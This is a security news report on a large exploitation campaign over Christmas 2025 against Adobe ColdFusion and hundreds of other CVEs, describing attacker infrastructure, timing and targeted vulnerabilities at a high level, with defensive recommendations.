Security researchers have uncovered a massive coordinated exploitation campaign where threat actors launched over 2.5 million malicious requests against vulnerable systems during the Christmas 2025 holiday period.
The campaign represents a sophisticated, multi-faceted initial access broker operation targeting Adobe ColdFusion servers alongside 46 additional technology stacks across nearly 800 vulnerabilities.
The primary attack wave focused on 10+ Adobe ColdFusion CVEs, with researchers identifying just under 6,000 direct requests against ColdFusion infrastructure.
However, deeper analysis revealed the true scope: two primary IP addresses operating from Japan-based hosting provider CTG Server Limited generated over 2.5 million requests across 767 distinct CVEs, leveraging approximately 10,000 unique callback domains for attack verification.
The threat actors deliberately timed the campaign for maximum impact, concentrating 68 percent of attack traffic on Christmas Day when security teams typically operate at reduced capacity.
This deliberate timing suggests a sophisticated threat actor with operational knowledge of enterprise security monitoring cycles.
The attackers used ProjectDiscovery Interactsh out-of-band callback infrastructure to verify successful exploitation attempts in real-time, enabling rapid identification of vulnerable systems suitable for follow-up compromise.
The campaign exploited critical vulnerabilities including CVE-2023-26359, a deserialization RCE affecting ColdFusion, which received 833 exploitation attempts.
CVE-2023-38205, an access control bypass, was targeted 654 times, while CVE-2023-44353 triggered 611 requests.
The primary attack vector employed JNDI/LDAP injection through WDDX deserialization, leveraging the JdbcRowSetImpl gadget chain to trigger remote code execution.
Beyond ColdFusion, the campaign demonstrates methodical reconnaissance across enterprise infrastructure.
Researchers at Greynoise identified 4,118 unique HTTP fingerprints and targeting of Java application servers, web frameworks, CMS platforms, Atlassian products, network devices, and surveillance systems.
Confluence OGNL vulnerability CVE-2022-26134 alone received 12,481 requests, while the legacy Shellshock vulnerability CVE-2014-6271 triggered 8,527 attempts.
The threat actors operated from AS152194 (CTG Server Limited), a Hong Kong-registered hosting provider with documented associations to phishing infrastructure and spam operations.
Security researchers have identified the network as hosting FUNNULL CDN infrastructure targeting luxury brands. This combination of abuse history and rapid IP space acquisition suggests limited abuse enforcement mechanisms.
Organizations operating Adobe ColdFusion servers should immediately apply security patches for CVE-2023-26359, CVE-2023-38205, and related vulnerabilities.
Security teams should implement network-based detection for JNDI injection payloads, OAST callback domains, and the identified threat actor IP addresses and JA4+ network fingerprints.
Continuous vulnerability scanning and monitoring of exploitation attempt patterns remain critical defensive priorities.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.